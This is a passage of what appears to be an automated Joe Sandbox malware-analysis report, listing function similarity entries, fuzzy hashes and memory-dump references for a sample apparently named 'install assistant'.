                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$hfJ
                                                                                                                • API String ID: 3519838083-1391159562
                                                                                                                • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                                                                                • Instruction ID: a5675785b1225ef3ad451509a0396422441cc898f68f567fa2b4766601de4ee8
                                                                                                                • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                                                                                • Instruction Fuzzy Hash: 3D913671910609DFCB10DFA9C8809DEBBF4BF29318F50851EE456B7A90D770EA48CB20
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9C6C5D
                                                                                                                  • Part of subcall function 6C9C561A: __EH_prolog.LIBCMT ref: 6C9C561F
                                                                                                                  • Part of subcall function 6C9C5A2E: __EH_prolog.LIBCMT ref: 6C9C5A33
                                                                                                                  • Part of subcall function 6C9C6EA5: __EH_prolog.LIBCMT ref: 6C9C6EAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: WZJ
                                                                                                                • API String ID: 3519838083-1089469559
                                                                                                                • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                                                                                • Instruction ID: 11310ceb26e00f43a8896d5b7a555a456327ac00d264907c4ebfaadd79b2ff1d
                                                                                                                • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                                                                                • Instruction Fuzzy Hash: 7E814C31E00159DFCF15DFA4D990AEDBBB4AF29318F10409AE416B7791DB30AE49CB62
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__aullrem
                                                                                                                • String ID: d%K
                                                                                                                • API String ID: 3415659256-3110269457
                                                                                                                • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                                                                                                • Instruction ID: 34a33d0f10f73edd72aded0e44243528dcc5c0c7ffc0c18868e4ba8a9a2f3fe8
                                                                                                                • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                                                                                                                • Instruction Fuzzy Hash: 6C61F531A002099FDF49CF56C5807EEB7F9AF5631CF24809AD864AF641C771D906CB55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: CK$CK
                                                                                                                • API String ID: 3519838083-2096518401
                                                                                                                • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                                                                                • Instruction ID: c9d95e0a8c73b152e696cecf22d339659815bd73d27be483f2b332e053862525
                                                                                                                • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                                                                                • Instruction Fuzzy Hash: 0A51A275A003059FDB04CFA4C9C0BEEB3B9FF89718F148519D921ABA41D774E94A8F60
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: <dJ$Q
                                                                                                                • API String ID: 3519838083-2252229148
                                                                                                                • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                                                                                • Instruction ID: e3e45dc81e7f0a450247fc3838e9aedfa879b079a5eb24a03c4e98c512f9c8d7
                                                                                                                • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                                                                                • Instruction Fuzzy Hash: BA51CE70A04259EFCF00CFD8C8818EDB7B5BF59308F10852EE512ABA50D730DA5ACB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $D^J
                                                                                                                • API String ID: 3519838083-3977321784
                                                                                                                • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                                                                                • Instruction ID: 0a20db9edc3c8b34181d66d70259b6d97ce3ea1c987c65ebaacb7c24d0db83ed
                                                                                                                • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                                                                                • Instruction Fuzzy Hash: 24417A21B045907EDB22AF68C4907ECBBA99F3730CF168158C4D607E85DB64D98BC393
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 8)L$8)L
                                                                                                                • API String ID: 3519838083-2235878380
                                                                                                                • Opcode ID: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                                                                                                • Instruction ID: 5ac3a585f861669fed7b16c5175820a9f349dcc3ed8e073de7fe64a9f71cfbf3
                                                                                                                • Opcode Fuzzy Hash: 1ee38908214ddba89c01b11f8f662c4b80f228d5f64c7dd9e77453d2deb43dcf
                                                                                                                • Instruction Fuzzy Hash: 6051DF31601A00CFC7158FB4D890BEABBF1FF95314F51846ED19AA7A60CB31B889CB84
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: qJ$#
                                                                                                                • API String ID: 3519838083-4209149730
                                                                                                                • Opcode ID: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                                                                                                • Instruction ID: 2f588e89e536bb68639cf403e3cd0ef5101956955e80a9f6bc96c422336233d1
                                                                                                                • Opcode Fuzzy Hash: e1f34668789bc69a62d5b524bab96a8de5a2ccca07942ae6dd88fce0d8712790
                                                                                                                • Instruction Fuzzy Hash: 68515935A00649DFCB00DFA8C5509DDB7B9BF29318F168159E811BBB51CB34FA19CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: PdJ$Q
                                                                                                                • API String ID: 3519838083-3674001488
                                                                                                                • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                                                                                                • Instruction ID: 88b5c54b5f134ac210e09b740e4ecbd1811af44b0814d2dd07a58bf59e09cabc
                                                                                                                • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                                                                                                                • Instruction Fuzzy Hash: 89419E71E00245DBCB10DFA9C491AEDB3B9FF49318B10812AE926A7A50C330DA55CBE3
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 0|J$`)L
                                                                                                                • API String ID: 3519838083-117937767
                                                                                                                • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                                                                                • Instruction ID: 5ad0498e0ff9ebb70dd705cca7bafac10d3b3a11235aef4c2fd670319d675d5d
                                                                                                                • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                                                                                • Instruction Fuzzy Hash: 4841A371601B46DFCB168FA0C4947EABBE6FF69208F00442EE55A97B10CB71E945CB51
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldiv
                                                                                                                • String ID: 3333
                                                                                                                • API String ID: 3732870572-2924271548
                                                                                                                • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                                                                                • Instruction ID: c3af1d911ed99afba8ba0d6da9fc3635ab86bc9af0235826f39ebbd3c8602c7a
                                                                                                                • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                                                                                • Instruction Fuzzy Hash: 672197B0900704AFD720CFB98884B5BBAFDEF98714F50891EE146D7B40D770E9888B65
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: #$4qJ
                                                                                                                • API String ID: 3519838083-3965466581
                                                                                                                • Opcode ID: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                                                                                                • Instruction ID: acc71f56c6f921bbd360453ed0f41fabdecb69ccca51f24c6a10a41ab9bd8d5a
                                                                                                                • Opcode Fuzzy Hash: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                                                                                                • Instruction Fuzzy Hash: 9431AB35A04618DFDB10DF65C860AEE73B9AF55B18F068198E811B7B50CB30FD45CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$LuJ
                                                                                                                • API String ID: 3519838083-205571748
                                                                                                                • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                                                                                • Instruction ID: bf302abe06f895ce6f0dcf7888a78779dc419780baea2b438e697a94a29ea051
                                                                                                                • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                                                                                • Instruction Fuzzy Hash: 20016D72E01609DACB10DFA984805AFF7B4FF69744F40C42EE569F3A40C334AA05CB99
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @$xMJ
                                                                                                                • API String ID: 3519838083-951924499
                                                                                                                • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                                                                                • Instruction ID: 2b1ee4bc6713c34d9656a438a226f3c4cc709c16e7e1946cd9b5217b58a8cca5
                                                                                                                • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                                                                                • Instruction Fuzzy Hash: 22113971A01209EBCB00CFD9C4905AFB7B4FF69308B50C86EE469E7A40D734DA45CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: p/K$J
                                                                                                                • API String ID: 3519838083-2069324279
                                                                                                                • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                                                                                • Instruction ID: 68a560bea433f7446d68d660d97e5072b4d8f2dcda06f06d0ef1ef13d64cc68e
                                                                                                                • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                                                                                • Instruction Fuzzy Hash: 5501BCB2A017519FD724CF58D6043AAF7F8EF51719F10C85EA092A3B40C7F8A9488BA4
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E8FCC
                                                                                                                  • Part of subcall function 6C9E84D1: __EH_prolog.LIBCMT ref: 6C9E84D6
                                                                                                                  • Part of subcall function 6C9E714B: __EH_prolog.LIBCMT ref: 6C9E7150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J
                                                                                                                • API String ID: 3519838083-2882003284
                                                                                                                • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                                                                                • Instruction ID: 1726090476934084088eae36961561e65932e36a447757e01728b019545ef3c5
                                                                                                                • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                                                                                • Instruction Fuzzy Hash: 2D01B3B1804B51CEC325CF56C5A468AFBE0BF25704F90C95EC4A657B51E7B8A508CB68
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA09439
                                                                                                                  • Part of subcall function 6CA094BA: __EH_prolog.LIBCMT ref: 6CA094BF
                                                                                                                  • Part of subcall function 6C9EB22B: __EH_prolog.LIBCMT ref: 6C9EB230
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: D.K$T.K
                                                                                                                • API String ID: 3519838083-2437000251
                                                                                                                • Opcode ID: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                                                                                                • Instruction ID: de0982aa736ee48be0d09eae3aaf6b1ff691df674a78b40f80594a40b2126eca
                                                                                                                • Opcode Fuzzy Hash: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                                                                                                • Instruction Fuzzy Hash: DB012C70911751CFC725CF69C6142DABBF4AF29708F00C91E80AA97B40E7B8AA48CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 8)L$8rJ
                                                                                                                • API String ID: 3519838083-896068166
                                                                                                                • Opcode ID: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                                                                                                • Instruction ID: bc9d15173ad0014651cff1e31253060cf2dda1c186e940ae38325659171766bc
                                                                                                                • Opcode Fuzzy Hash: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                                                                                                • Instruction Fuzzy Hash: BCF03A7AA04114EFC701CF98D949ADEBBF8FF46355F14806AF405A7211C7B8DA04CBA5
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E23F9
                                                                                                                  • Part of subcall function 6C9E2320: __EH_prolog.LIBCMT ref: 6C9E2325
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: `)L$|{J
                                                                                                                • API String ID: 3519838083-2198066115
                                                                                                                • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                                                                                                • Instruction ID: 421682b52329097cbd21b0e7997e607a734ecf213bef24830ae944be8d7d0bce
                                                                                                                • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                                                                                                • Instruction Fuzzy Hash: 8EF08272610414FFCB069F94DC04BDE7BA9FF69714F00802AF50596650CBB5AA14CB94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: <oJ
                                                                                                                • API String ID: 3037903784-2791053824
                                                                                                                • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                                                                                • Instruction ID: 556370bf7b3a6c6d56d4fe65192e9b36b440e95207cc20346bcaec3d0aea5678
                                                                                                                • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                                                                                                • Instruction Fuzzy Hash: F6E0E532A01510AFD7089F48D810BDEF7B8EF54B18F12405FA01163B42CBB1F90886C4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: \~J
                                                                                                                • API String ID: 3037903784-3176329776
                                                                                                                • Opcode ID: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                                                                                                • Instruction ID: 155a011aa3b230506b28587f069503ff355d96d2b23ec95a064a463f32ff4621
                                                                                                                • Opcode Fuzzy Hash: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                                                                                                • Instruction Fuzzy Hash: 92E06D32B055219BDB269F48E810BDEF3A8EF68B19F10815EE411A7A51DBB1EC049690
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologctype
                                                                                                                • String ID: |zJ
                                                                                                                • API String ID: 3037903784-3782439380
                                                                                                                • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                                                                                • Instruction ID: 78864a2fa9af7f277f8a5cd3df7f6d17eb0221fc83aa1a718584b7b0c87115f6
                                                                                                                • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                                                                                                • Instruction Fuzzy Hash: 5DE065726055209BE7158F49D8007DEF3A8FF79B14F10405F9413A7B42CBB1E8048785
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9E70E0
                                                                                                                  • Part of subcall function 6C9E714B: __EH_prolog.LIBCMT ref: 6C9E7150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: J$0J
